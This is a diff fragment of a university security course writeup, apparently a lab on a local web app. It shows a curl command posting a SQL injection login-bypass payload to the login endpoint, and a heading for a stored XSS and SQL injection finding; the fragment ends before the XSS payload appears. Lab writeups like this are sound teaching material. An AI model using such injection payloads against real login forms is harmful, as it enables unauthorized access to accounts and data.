MingoMango17/CMSC134-Writeups/Machine_Problem_3/writeup.md

 > curl 'http://0.0.0.0:5000/login' -X POST --data-raw "username=' UNION select 1 from users; --&password="
 > ```

-> [!NOTE]- Stored XSS and SQL Injection Vulnerability by Execution of Arbitrary SQL Queries and JavaScript (aCVE-2024-0002).
+> **Stored XSS and SQL Injection Vulnerability by Execution of Arbitrary SQL Queries and JavaScript (aCVE-2024-0002)**
 >
 > Use these as the message:
 >